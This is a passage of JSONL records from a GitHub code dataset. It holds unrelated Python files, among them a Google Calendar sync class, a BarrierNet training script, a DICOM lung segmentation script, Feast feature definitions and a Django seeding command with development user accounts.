__init__(self):\n self.service = self.make_calendar_service()\n self.workflowy_calendar_id = self.get_calendar_id(\"workflowy\")\n\n def make_calendar_service(self):\n creds = None\n if os.path.exists(TOKEN_FILE):\n creds = Credentials.from_authorized_user_file(TOKEN_FILE, SCOPES)\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n CREDENTIALS_FILE, SCOPES\n )\n creds = flow.run_local_server(port=0)\n with open(TOKEN_FILE, \"w\") as token:\n token.write(creds.to_json())\n return build(\"calendar\", \"v3\", credentials=creds)\n\n def get_calendar_id(self, calendar_name):\n calendar_list = self.service.calendarList().list(pageToken=None).execute()\n for calendar_list_entry in calendar_list[\"items\"]:\n if calendar_list_entry[\"summary\"] == \"workflowy\":\n return calendar_list_entry[\"id\"]\n raise Exception(\"workflowy calendar not found\")\n\n def get_events(self):\n events_result = (\n self.service.events()\n .list(calendarId=self.workflowy_calendar_id, maxResults=10)\n .execute()\n )\n return events_result.get(\"items\", [])\n\n def get_event(self, uuid):\n uuid = uuid.replace(\"-\", \"\")\n try:\n return (\n self.service.events()\n .get(calendarId=self.workflowy_calendar_id, eventId=uuid)\n .execute()\n )\n except:\n return None\n\n def insert_event(self, uuid, summary, start, end):\n print(f\"inserting event '{uuid}' {summary} {start} {end}\")\n uuid = uuid.replace(\"-\", \"\")\n event = {\n \"id\": uuid,\n \"summary\": summary,\n \"location\": \"\",\n \"description\": \"\",\n \"start\": {\n \"dateTime\": start,\n \"timeZone\": \"America/Los_Angeles\",\n },\n \"end\": {\n \"dateTime\": end,\n \"timeZone\": \"America/Los_Angeles\",\n },\n \"reminders\": {\n \"useDefault\": False,\n },\n }\n self.service.events().insert(\n calendarId=self.workflowy_calendar_id, body=event\n ).execute()\n # print(f\"Event created: {event.get('htmlLink')}\")\n\n def update_event(self, uuid, summary, start, end):\n print(f\"update event '{uuid}' {summary} {start} {end}\")\n uuid = uuid.replace(\"-\", \"\")\n event = {\n \"id\": uuid,\n \"summary\": summary,\n \"location\": \"\",\n \"description\": \"\",\n \"start\": {\n \"dateTime\": start,\n \"timeZone\": \"America/Los_Angeles\",\n },\n \"end\": {\n \"dateTime\": end,\n \"timeZone\": \"America/Los_Angeles\",\n },\n \"reminders\": {\n \"useDefault\": False,\n },\n }\n self.service.events().update(\n calendarId=self.workflowy_calendar_id, eventId=uuid, body=event\n ).execute()\n","repo_name":"nhardt/workflowy-to-google-calendar","sub_path":"lib/GCal.py","file_name":"GCal.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13800480195","text":"from chapter1.Bag import Bag\n\n\nclass EdgeWeightedGraph:\n def __init__(self, V):\n \"\"\"\n Args:\n V: int, 顶点总数\n \"\"\"\n self.V = V\n self.E = 0\n self.adj = [Bag() for _ in range(V)]\n\n def add_edge(self, e):\n \"\"\"\n Args:\n e: Edge\n \"\"\"\n v = e.either()\n w = e.other(v)\n self.adj[v].add(e)\n self.adj[w].add(e)\n self.E += 1\n\n def edges(self):\n \"\"\"\n Return:\n Iterable<Edge>\n \"\"\"\n b = Bag()\n for v in range(self.V):\n for e in self.adj[v]:\n if e.other(v) > v:\n b.add(e)\n return b ","repo_name":"AiZhanghan/Algorithms-Fourth-Edition","sub_path":"code/chapter4/EdgeWeightedGraph.py","file_name":"EdgeWeightedGraph.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1998341823","text":"from django.conf.urls import patterns, url, include\nfrom django.views.generic import TemplateView\n\nurlpatterns=patterns('home.views',\n #HOME\n url(r'^$','index_view', name='vista_principal'),\n #estaticos\n url(r'^humans.txt$', TemplateView.as_view(template_name='statics/humans.txt', content_type='text/plain; charset=utf-8')),\n url(r'^robots.txt$', TemplateView.as_view(template_name='statics/robots.txt', content_type='text/plain; charset=utf-8')),\n url(r'^sitemap.xml$', TemplateView.as_view(template_name='statics/sitemap.xml', content_type='application/xml; charset=utf-8')),\n #secciones\n url(r'^lo-que-hacemos/$', 'loqueHacemos'),\n url(r'^lo-que-hacemos/ux-ui-design/$', 'uxDesign'),\n url(r'^lo-que-hacemos/ecommerce/$', 'eCommerce'),\n url(r'^lo-que-hacemos/websites/$', 'webSites'),\n url(r'^lo-que-hacemos/marketing-online/$', 'marketingOnline'),\n url(r'^lo-que-hacemos/aplicaciones-web/$', 'appWeb'),\n #secciones\n url(r'^nuestro-trabajo/$', 'portafolio'),\n url(r'^contacto/$', 'contacto'),\n url(r'^about-us/$', 'aboutUS'),\n url(r'^expo-guadalajara/$', 'landing'),\n\n #Equipo y sus paginas.\n url(r'^team/$', 'team'),\n url(r'^alen/$', 'alen'),\n url(r'^jesus/$', 'chucho'),\n url(r'^luciano/$', 'luciano'),\n #REDirects\n url(r'^blog/$', 'blogRedirect'),\n url(r'^facebook/$', 'facebookRedirect'),\n url(r'^twitter/$', 'twitterRedirect'),\n url(r'^g\\+/$', 'gplusRedirect'),\n url(r'^map/$', 'blogRedirect'),\n url(r'^fcq/$', 'blogRedirect'),\n\n)","repo_name":"xtornasol512/phyro","sub_path":"back-end/phyro/home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3689181864","text":"import torch\nimport torch.nn as nn\nfrom my_classes import Dataset_list as Dataset\nimport scipy.io as sio\nimport models\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nplt.style.use('bmh')\n\nbarriernet = 1\n\n# CUDA for PyTorch\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\nprint(\"Using {} device\".format(device))\ntorch.backends.cudnn.benchmark = True\n\n\n# Datasets from mat\ntrain_data = sio.loadmat('data/data_train_ocbf.mat')\ntrain_data = train_data['data_train_ocbf'] # data_train for oc controller\ntest_data = sio.loadmat('data/data_test_ocbf.mat')\ntest_data = test_data['data_test_ocbf'] # data_test for oc controller\nimpl_data = sio.loadmat('data/data_ip.mat')\nimpl_data = impl_data['data_ip']\n\ntrain0 = np.float32(train_data[:,0:4]) # x_ip, v_ip, x_i, v_i\ntrain_labels = np.reshape(np.float32(train_data[:,4]), (len(train_data),1))\ntest0 = np.float32(test_data[:,0:4])\ntest_labels = np.reshape(np.float32(test_data[:,4]), (len(test_data),1))\nimpl0 = np.float32(impl_data)\ninit = train0[0]\n\n# data normalization\nmean = np.mean(train0, axis = 0)\nstd= np.std(train0, axis = 0)\ntrain0 = (train0 - mean)/std\ntest0 = (test0 - mean)/std\nimpl0 = (impl0 - mean)/std\n\n\n# Parameters\nparams = {'batch_size': 32,\n 'shuffle': True,\n 'num_workers': 12}\n\n# Generators\ntraining_set = Dataset(train0, train_labels)\ntrain_dataloader = torch.utils.data.DataLoader(training_set, **params)\n\ntest_set = Dataset(test0, test_labels)\ntest_dataloader = torch.utils.data.DataLoader(test_set, **params)\n\n\n# Initialize the model.\nnFeatures, nHidden1, nHidden21, nHidden22, nCls = 4, 72, 24, 24, 1\nif (barriernet == 1):\n model = models.BarrierNet(nFeatures, nHidden1, nHidden21, nHidden22, nCls, mean, std, device, bn=False).to(device)\nelse:\n model = models.FCNet(nFeatures, nHidden1, nHidden21, nHidden22, nCls, mean, std, device, bn=False).to(device)\nprint(model)\n\n# Initialize the optimizer.\nlearning_rate = 1e-3\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate) #Adam\nloss_fn = nn.MSELoss()\n\n\ndef train(dataloader, model, loss_fn, optimizer, losses):\n size = len(dataloader.dataset)\n model.train()\n for batch, (X, y) in enumerate(dataloader):\n X, y = X.to(device), y.to(device)\n \n # Compute prediction error\n pred = model(X)\n loss = loss_fn(pred, y)\n losses.append(loss.item())\n\n # Backpropagation\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if batch % 25 == 0:\n loss, current = loss.item(), batch * len(X)\n print(f\"loss: {loss:>7f} [{current:>5d}/{size:>5d}]\")\n return losses\n\ndef test(dataloader, model, loss_fn, losses):\n size = len(dataloader.dataset)\n num_batches = len(dataloader)\n model.eval()\n test_loss = 0\n with torch.no_grad():\n for X, y in dataloader:\n X, y = X.to(device), y.to(device)\n pred = model(X)\n loss = loss_fn(pred, y)\n test_loss += loss.item()\n test_loss /= num_batches\n losses.append(test_loss)\n print(f\"Test avg loss: {test_loss:>8f} \\n\")\n return losses\n\n \nepochs = 20 \ntrain_losses, test_losses = [], []\nfor t in range(epochs):\n print(f\"Epoch {t+1}\\n-------------------------------\")\n train_losses = train(train_dataloader, model, loss_fn, optimizer, train_losses)\n test_losses = test(test_dataloader, model, loss_fn, test_losses)\nprint(\"Training Done!\")\n\n\n#save model\nif (barriernet == 1):\n torch.save(model.state_dict(), \"model_ocbf_bn.pth\")\nelse:\n torch.save(model.state_dict(), \"model_ocbf_fc.pth\")\nprint(\"Saved PyTorch Model State to xx.pth\")\n\n\n# on the test dataset\nmodel.eval()\npredic, actual, t = [], [], []\nt0 = 0\n\nwith torch.no_grad():\n for i in range(len(test0)):\n x, y = Variable(torch.from_numpy(test0[i]), requires_grad=False), test_labels[i]\n x = torch.reshape(x, (1,nFeatures))\n x = x.to(device)\n pred = model(x)\n predic.append(pred.item())\n actual.append(y)\n t.append(t0)\n t0 = t0 + 0.06\nprint(\"Test done!\") \n\npos, vel = init[2], init[3]\ntr, tr0 = [], 0\nimplem, safety, lb = [], [], []\ndt = 0.1\n\n# running on a vehicle\nwith torch.no_grad():\n for i in range(0,len(impl0),10):\n #normalize\n x = (pos - mean[2])/std[2]\n v = (vel - mean[3])/std[3]\n x_ip = impl0[i,0]*std[0] + mean[0] #recover\n #get safety metric\n safe = (x_ip - pos)/vel\n safety.append(safe)\n lb.append(1.8)\n #prepare for model input\n impl0[i,2] = x\n impl0[i,3] = v\n x_r = Variable(torch.from_numpy(impl0[i]), requires_grad=False)\n x_r = torch.reshape(x_r, (1,nFeatures))\n x_r = x_r.to(device)\n ctrl = model(x_r)\n \n #integrate dynamics\n pos = pos + vel*dt + 0.5*ctrl.item()*dt*dt\n vel = vel + ctrl.item()*dt\n \n implem.append(ctrl.item())\n tr.append(tr0)\n tr0 = tr0 + dt\nprint(\"Implementation done!\")\n \n\nplt.figure(1)\nplt.plot(t, predic, color = 'green', label = 'predicted')\nplt.plot(t, actual, color = 'red', label = 'actual(optimal)')\nplt.plot(tr, implem, color = 'blue', label = 'implemented')\nplt.legend()\nplt.ylabel('Control')\nplt.xlabel('time')\nplt.show()\n# plt.savefig('control_ocbf_bn.png')\n\nplt.figure(2) \nplt.plot(train_losses, color = 'green', label = 'train')\nplt.plot(test_losses, color = 'red', label = 'test')\nplt.legend()\nplt.ylabel('Loss')\nplt.xlabel('time')\nplt.ylim(ymin=0.)\nplt.show()\n# plt.savefig('Loss_ocbf_bn.png')\n\nplt.figure(3) \nplt.plot(tr, safety, color = 'green', label = 'safety')\nplt.plot(tr, lb, color = 'red', label = 'lower bound')\nplt.legend()\nplt.ylabel('Safety')\nplt.xlabel('time')\nplt.show()\n# plt.savefig('Safety_ocbf_bn.png')\n\nprint(\"end\")","repo_name":"Weixy21/BarrierNet","sub_path":"Merging/merging-barriernet.py","file_name":"merging-barriernet.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"16"} +{"seq_id":"15062894600","text":"import pickle\nimport glob\nimport numpy as np\nimport sortedcontainers as sc\nfrom cloud_as_function import CloudAsFunction\nfrom multiprocessing import Process, Queue\n\n\ndef add_game(used_set, player, game):\n if used_set[player] is None:\n used_set[player] = []\n used_set[player].append(game)\n\n\ndef compare_to(valid_function, knn_set, k):\n sorted_list = sc.SortedList()\n for player, functions in knn_set.items():\n for unique_function in functions:\n try:\n score = valid_function.custom_distance_with(unique_function)\n if score < CloudAsFunction.theoric_max:\n sorted_list.add((score, player))\n except Exception as e:\n raise e\n \n player_count = {}\n for (score, player) in sorted_list[:k]:\n if player not in player_count.keys():\n player_count[player] = [0, 77777]\n player_count[player][0] += 1\n player_count[player][1] = min(score, player_count[player][1])\n \n max_score = 666666\n max_count = 0\n max_player = \"\"\n\n for player, element in player_count.items():\n count = element[0]\n score = element[1]\n if max_count < count:\n max_player = player\n max_count = count\n max_score = score\n elif max_count == count:\n if max_score > score:\n max_player = player\n max_score = score\n return max_player, max_score\n\n\ndef split(game_set, folds=10, weights=np.asarray([87, 0, 0, 0, 1000, 1000, 1])):\n i = 0\n for i in range(folds):\n functions_train_set = dict.fromkeys(games.keys())\n functions_validation_set = dict.fromkeys(games.keys())\n \n for player, games_of_him in game_set.items():\n games_length = len(games_of_him)\n for index, game in enumerate(games_of_him):\n if index >= int(games_length*i/folds) and index < int(games_length*(i+1)/folds):\n add_game(functions_validation_set, player, CloudAsFunction(game, weights))\n else:\n add_game(functions_train_set, player, CloudAsFunction(game, weights))\n \n for player, games_of_him in functions_train_set.items():\n try:\n functions_train_set[player] = [CloudAsFunction.aggregate(games_of_him)]\n except Exception:\n print('cannot aggregate player, doesn\\'t do anything then, pass')\n raise\n \n yield functions_train_set, functions_validation_set\n return\n\n\ndef split_valid(game_set, folds=4):\n for i in range(folds):\n functions_validation_set = dict.fromkeys(games.keys())\n \n for player, games_of_him in game_set.items():\n if games_of_him is None:\n continue\n games_length = len(games_of_him)\n for index, game in enumerate(games_of_him):\n if index >= int(games_length*i/folds) and index < int(games_length*(i+1)/folds):\n add_game(functions_validation_set, player, game)\n else:\n continue\n \n yield functions_validation_set\n return\n\n\ndef run(functions_train_set, functions_validation_set, q):\n correct = 0\n incorrect = 0\n for key, value in functions_validation_set.items():\n if value is None:\n continue\n for one_game in value:\n try:\n prediction, score = compare_to(one_game, functions_train_set, 1)\n if key == prediction:\n correct += 1\n else:\n incorrect += 1\n except IndexError:\n continue\n q.put((correct, incorrect))\n\n\ndef simulate(games_dict, weights=np.asarray([87, 0, 0, 0, 1000, 1000, 1])):\n correct = 0\n incorrect = 0\n\n q_list = []\n\n print(\"<simulate>: begin splitting\")\n sets = split(games_dict, 10, weights)\n \n print(\"<simulate>: begin testing\")\n for i, (functions_train_set, functions_validation_set) in enumerate(sets):\n print(\"<simulate>: compute score fold {}\".format(i))\n computing = []\n valid_sets = split_valid(functions_validation_set)\n \n for sub_valid_set in valid_sets:\n q_list.append(Queue())\n computing.append(Process(target=run, args=(functions_train_set, sub_valid_set, q_list[-1])))\n computing[-1].start()\n for t, q in zip(computing, q_list):\n c, inc = q.get()\n correct += c\n incorrect += inc\n t.join()\n break\n return correct / (correct + incorrect)\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n\n games = {}\n\n print(\"<general>: loading games\")\n\n for filename in glob.iglob('.\\small functions bt\\*.dat'):\n with open(filename, 'rb') as f:\n games[filename[18:-4]] = pickle.load(f)\n\n bef_value = -1\n conseq_desc = 0\n for i in range(5, 51, 5):\n CloudAsFunction.window = i\n value = simulate(games, weights=np.asarray([1, 121, 121, 121, 101, 101, 1]))\n if value < bef_value:\n conseq_desc += 1\n else:\n conseq_desc = 0\n if conseq_desc >= 5:\n break\n bef_value = value\n print(\"for window = {}, success is : {}\".format(i, value))\n print(\"for step = {}, success is : {}\".format(i, value))\n\n\n","repo_name":"gegeAi/fdcompo","sub_path":"optimize_interval.py","file_name":"optimize_interval.py","file_ext":"py","file_size_in_byte":5455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33720995340","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport pydicom as dicom \nimport os\nfrom skimage.segmentation import clear_border\n\npath = \".\\scans\"\nsegmentation = []\nimagens = []\nseg_aux_paths = []\npaths_seg = []\npaths_img = []\n\ndef display(display_list):\n plt.figure(figsize=(15, 15))\n\n title = ['Input Image', 'True Mask', 'Predicted Mask']\n\n for i in range(len(display_list)):\n plt.subplot(1, len(display_list), i+1)\n plt.title(title[i])\n plt.imshow(display_list[i])\n plt.axis('off')\n plt.show()\n\ndef sort_list(list_str):\n x=[]\n dig=\"0123456789\"\n for i in list_str:\n p=\"\"\n for j in i:\n if j in dig:\n p+=j\n x.append(int(p))\n y=[]\n y.extend(x)\n x.sort()\n res=[]\n for i in x:\n res.append(list_str[y.index(i)])\n return res\n\ndef get_images_dir(path):\n for root, dirs, files in os.walk(path):\n files.sort()\n for file in files:\n relativePath = os.path.join(root, file)\n if('lung_mask' in relativePath):\n seg_aux_paths.append(relativePath)\n else:\n paths_img.append(relativePath)\n\n if('lung_mask' in root):\n aux_name = sort_list(seg_aux_paths)\n seg_aux_paths.clear()\n for filepath in aux_name:\n paths_seg.append(filepath)\n\ndef get_images(path):\n get_images_dir(path)\n print(len(paths_seg), len(paths_img))\n for i in range(len(paths_seg)):\n path_image, path_mask = paths_seg[i], paths_img[i]\n segmentation.append(dicom.dcmread(path_image).pixel_array)\n imagens.append(dicom.dcmread(path_mask).pixel_array)\n\nget_images(path)\n\npred = []\n\ndef normalize_canais(input_image):\n input_image = np.stack((input_image,)*1, axis=-1)\n return input_image\n\nkernel = np.ones((14, 14), 'uint8')\nkernel2 = np.ones((12, 12), 'uint8')\nfor i in range(len(segmentation)):\n \n img = normalize_canais(imagens[i])\n\n filtro = cv2.medianBlur(img, 5)\n erode_img = cv2.erode(filtro, kernel2, iterations=1)\n dilate_img = cv2.dilate(erode_img, kernel, iterations=1)\n # Aplica uma limiarização para binarizar a imagem\n ret, thresh = cv2.threshold(dilate_img, 0, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n\n mask = np.vectorize(clear_border, signature='(n,m)->(n,m)')(thresh)\n\n pred.append(mask)\n #para ver de maneira visual a segmentacao\n #display([imagens[i], segmentation[i], mask])\n\ndef get_metrics_pixel_to_pixel(true, predict):\n fn = 0\n tp = 0\n tn = 0\n fp = 0\n for index in range(len(predict)):\n for indexInside in range(len(predict[index])):\n for indexDeep in range(len(predict[index][indexInside])):\n if true[index][indexInside][indexDeep] == 255 and predict[index][indexInside][indexDeep] == 255:\n tp += 1\n if true[index][indexInside][indexDeep] == 0 and predict[index][indexInside][indexDeep] == 0:\n tn += 1\n if true[index][indexInside][indexDeep] == 255 and predict[index][indexInside][indexDeep] == 0:\n fn += 1\n if true[index][indexInside][indexDeep] == 0 and predict[index][indexInside][indexDeep] == 255:\n fp += 1\n \n return fn, tp, tn, fp\n\nfn, tp, tn, fp = get_metrics_pixel_to_pixel(segmentation, pred)\nprecision = tp / (tp + fp)\nrecall = tp / (tp + fn)\nF1_score = 2 * (precision * recall) / (precision + recall)\ndice_Coefficient = 2 * tp / (2*tp + fp + fn)\nacuracia = (tp + tn) / (tp + fp + fn + tn)\nprint(\"False Negative: \" + str(fn) + \" True Negative: \" + str(fp))\nprint(\"False Positive: \" + str(tp) + \" True Positive: \" + str(tn))\nprint(\"Precision: \" + str(precision))\nprint(\"recall: \" + str(recall))\nprint(\"F1_score: \" + str(F1_score))\nprint(\"Dice Coefficient: \" + str(dice_Coefficient))\nprint(\"acuracia: \" + str(acuracia))\n\n\n","repo_name":"josepedroso/segmented_dicom_images","sub_path":"segmenta.py","file_name":"segmenta.py","file_ext":"py","file_size_in_byte":3733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2584126987","text":"#!/usr/bin/env python3\nimport fbmatrix\nimport argparse\nimport time\nimport assembly.yuv420\nfrom ffpyplayer.player import MediaPlayer\nimport numpy as np\nfrom pyrr import Matrix44\n\ndef render():\n global bytearray, player\n global args\n \n videoAspect = screenAspect = args.columns/args.rows\n \n frame, val = player.get_frame()\n\n if frame:\n img, t = frame\n\n data = img.to_bytearray()\n size = img.get_size()\n \n videoAspect = size[0]/size[1]\n \n bytearray.setYUV420(data, size[0], size[1])\n\n time.sleep(val)\n\n M = np.eye(4, dtype=np.float32)\n\n if not args.stretch:\n if args.fit:\n if screenAspect > videoAspect:\n # Pillar box\n M = M * Matrix44.from_scale( (1, screenAspect/videoAspect, 1, 1))\n else:\n # Letter box\n M = M * Matrix44.from_scale( (videoAspect/screenAspect, 1, 1))\n else:\n if screenAspect > videoAspect:\n # Pillar box\n M = M * Matrix44.from_scale( (videoAspect/screenAspect, 1, 1))\n else:\n # Letter box\n M = M * Matrix44.from_scale( (1, screenAspect/videoAspect, 1))\n\n bytearray.setProjection(M)\n bytearray.render()\n\nimport common\n\nparser = argparse.ArgumentParser(description='Framebuffer RGB matrix player')\ncommon.add_args(parser)\nparser.add_argument('--fit', action='store_true', help='Fit the video as large as it can but maintaining aspect ratio. This means some part will be cut off')\nparser.add_argument('--stretch', action='store_true', help='Stretch the video to fit the screen exactly, which means aspect ratio will not be preserved. I really hate it when people do this.')\nparser.add_argument('videofile', help='Video to play')\n\nargs = parser.parse_args()\n\nplayer = MediaPlayer(args.videofile, ff_opts={'out_fmt':'yuv420p'})\n\nmatrix = common.renderer_from_args(args)\n\nbytearray = assembly.yuv420.bytearray(supersample = args.supersample)\n\nmatrix.run(render)\n","repo_name":"sharky5102/fbmatrix","sub_path":"fbmplay.py","file_name":"fbmplay.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"} +{"seq_id":"21007684308","text":"from datetime import timedelta\n\nimport pandas as pd\nfrom feast import (\n FeatureView,\n Field,\n)\nfrom feast.on_demand_feature_view import on_demand_feature_view\nfrom feast.types import Float32, Float64, String\n\nfrom data_sources import *\nfrom entities import *\n\ndriver_hourly_stats_view = FeatureView(\n name=\"driver_hourly_stats\",\n description=\"Hourly features\",\n entities=[\"driver\"],\n ttl=timedelta(seconds=8640000000),\n schema=[\n Field(name=\"conv_rate\", dtype=Float32),\n Field(name=\"acc_rate\", dtype=Float32),\n ],\n online=True,\n source=driver_stats,\n tags={\"production\": \"True\"},\n owner=\"test2@gmail.com\",\n)\n\ndriver_daily_features_view = FeatureView(\n name=\"driver_daily_features\",\n entities=[\"driver\"],\n ttl=timedelta(seconds=8640000000),\n schema=[\n Field(name=\"daily_miles_driven\", dtype=Float32),\n Field(name=\"lat\", dtype=Float32),\n Field(name=\"lon\", dtype=Float32),\n ],\n online=True,\n source=driver_stats_push_source,\n tags={\"production\": \"True\"},\n owner=\"test2@gmail.com\",\n)\n\n\n# Define an on demand feature view which can generate new features based on\n# existing feature views and RequestSource features\n@on_demand_feature_view(\n sources=[driver_hourly_stats_view, val_to_add_request],\n schema=[\n Field(name=\"conv_rate_plus_val1\", dtype=Float64),\n Field(name=\"conv_rate_plus_val2\", dtype=Float64),\n ],\n)\ndef transformed_conv_rate(inputs: pd.DataFrame) -> pd.DataFrame:\n df = pd.DataFrame()\n df[\"conv_rate_plus_val1\"] = inputs[\"conv_rate\"] + inputs[\"val_to_add\"]\n df[\"conv_rate_plus_val2\"] = inputs[\"conv_rate\"] + inputs[\"val_to_add_2\"]\n return df\n\n\n@on_demand_feature_view(\n sources=[driver_daily_features_view],\n schema=[Field(name=\"avg_hourly_miles_driven\", dtype=Float64),],\n)\ndef avg_hourly_miles_driven(inputs: pd.DataFrame) -> pd.DataFrame:\n df = pd.DataFrame()\n df[\"avg_hourly_miles_driven\"] = inputs[\"daily_miles_driven\"] / 24\n return df\n\n\n@on_demand_feature_view(\n sources=[driver_daily_features_view],\n schema=[Field(name=f\"geohash_{i}\", dtype=String) for i in range(1, 7)],\n)\ndef location_features_from_push(inputs: pd.DataFrame) -> pd.DataFrame:\n import pygeohash as gh\n\n df = pd.DataFrame()\n df[\"geohash\"] = inputs.apply(lambda x: gh.encode(x.lat, x.lon), axis=1).astype(\n \"string\"\n )\n\n for i in range(1, 7):\n df[f\"geohash_{i}\"] = df[\"geohash\"].str[:i].astype(\"string\")\n return df\n","repo_name":"feast-dev/feast-workshop","sub_path":"module_2/feature_repo/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"16"} +{"seq_id":"24404239521","text":"import torch.nn as nn\nimport torch\nfrom timm.models.layers import trunc_normal_\nfrom torch.nn import functional as F\nin_place = True\ndef init_weights(m):\n if isinstance(m, nn.Linear):\n trunc_normal_(m.weight, std=0.02)\n if isinstance(m, nn.Linear) and m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.LayerNorm):\n nn.init.constant_(m.bias, 0)\n nn.init.constant_(m.weight, 1.0)\ndef unpadding(y, target_size):\n H, W = target_size\n H_pad, W_pad = y.size(2), y.size(3)\n extra_h = H_pad - H\n extra_w = W_pad - W\n if extra_h > 0:\n y = y[:, :, :-extra_h]\n if extra_w > 0:\n y = y[:, :, :, :-extra_w]\n return y\nclass Conv3d(nn.Conv3d):\n\n def __init__(self, in_channels, out_channels, kernel_size, stride=(1,1,1), padding=(0,0,0), dilation=(1,1,1), groups=1, bias=False):\n super(Conv3d, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias)\n\n def forward(self, x):\n weight = self.weight\n weight_mean = weight.mean(dim=1, keepdim=True).mean(dim=2, keepdim=True).mean(dim=3, keepdim=True).mean(dim=4, keepdim=True)\n weight = weight - weight_mean\n std = torch.sqrt(torch.var(weight.view(weight.size(0), -1), dim=1) + 1e-12).view(-1, 1, 1, 1, 1)\n weight = weight / std.expand_as(weight)\n return F.conv3d(x, weight, self.bias, self.stride, self.padding, self.dilation, self.groups)\n\ndef conv3x3x3(in_planes, out_planes, kernel_size=(3,3,3), stride=(1,1,1), padding=1, dilation=1, bias=False, weight_std=False):\n \"3x3x3 convolution with padding\"\n if weight_std:\n return Conv3d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, bias=bias)\n else:\n return nn.Conv3d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, bias=bias)\nclass NoBottleneck(nn.Module):\n def __init__(self, inplanes, planes, stride=1, dilation=1, downsample=None, fist_dilation=1, multi_grid=1, weight_std=False):\n super(NoBottleneck, self).__init__()\n self.weight_std = weight_std\n self.gn1 = nn.GroupNorm(16, inplanes)\n self.conv1 = conv3x3x3(inplanes, planes, kernel_size=(3, 3, 3), stride=stride, padding=(1,1,1),\n dilation=dilation * multi_grid, bias=False, weight_std=self.weight_std)\n self.relu = nn.LeakyReLU(0.1,inplace=in_place)\n\n self.gn2 = nn.GroupNorm(16, planes)\n self.conv2 = conv3x3x3(planes, planes, kernel_size=(3, 3, 3), stride=1, padding=(1,1,1),\n dilation=dilation * multi_grid, bias=False, weight_std=self.weight_std)\n self.downsample = downsample\n self.dilation = dilation\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.gn1(x)\n out = self.relu(out)\n out = self.conv1(out)\n\n\n out = self.gn2(out)\n out = self.relu(out)\n out = self.conv2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out = out + residual\n\n return out","repo_name":"SooLab/CCQ","sub_path":"code/network/utils_.py","file_name":"utils_.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"11442396512","text":"# -*- coding: utf-8 -*-\n\nfrom django.core.management.base import BaseCommand\nfrom django.contrib.auth.models import User, Permission\nfrom django.contrib.auth.models import Group\nfrom activities.models import Local, Activity, Dish\nfrom users.models import Guest, Chef, Monitor, Manager, Plan\nfrom django.contrib.contenttypes.models import ContentType\n\n\nclass Command(BaseCommand):\n args = '<foo bar ...>'\n help = 'our help string comes here'\n\n def _migrate(self):\n # Drop all tables\n print('Dropping tables...')\n\n User.objects.all().delete()\n Activity.objects.all().delete()\n Local.objects.all().delete()\n Dish.objects.all().delete()\n\n print('Dropping tables...OK')\n print('Populating database...')\n\n # ==================================================================================================\n # ==================================================================================================\n\n Group.objects.get_or_create(name='Guest')\n Group.objects.get_or_create(name='Monitor')\n Group.objects.get_or_create(name='Chef')\n Group.objects.get_or_create(name='Manager')\n print('Groups created...Ok')\n\n plan = ContentType.objects.get_for_model(Plan)\n Permission.objects.get_or_create(codename='free',\n name='Free',\n content_type=plan)\n Permission.objects.get_or_create(codename='lite',\n name='Lite',\n content_type=plan)\n Permission.objects.get_or_create(codename='premium',\n name='Premium',\n content_type=plan)\n print('Permissions created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n admin_admin = User(\n username='admin',\n email='admin@admin.com')\n admin_admin.set_password('admin')\n admin_admin.is_staff = True\n admin_admin.is_superuser = True\n admin_admin.save()\n\n print('Admins created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n guest1 = Guest(\n username='guest1',\n email='guest1@guest1.com',\n first_name='guest1',\n avatar='/images/user1.ico',\n )\n guest1.set_password('guest1')\n guest1.save()\n guest1.groups.add(Group.objects.get(name='Guest'))\n\n guest2 = Guest(\n username='guest2',\n email='guest2@guest2.com',\n first_name='guest2',\n )\n guest2.set_password('guest2')\n guest2.save()\n guest2.groups.add(Group.objects.get(name='Guest'))\n print('Guests created...Ok')\n\n # ==================================================================================================\n # ==================================================================================================\n\n chef1 = Chef(\n username='chef1',\n email='chef1@chef1.com',\n first_name='chef1',\n )\n chef1.set_password('chef1')\n chef1.save()\n chef1.groups.add(Group.objects.get(name='Chef'))\n chef1.user_permissions.add(Permission.objects.get(name='Free'))\n\n chef2 = Chef(\n username='chef2',\n email='chef2@chef2.com',\n first_name='chef2',\n )\n chef2.set_password('chef2')\n 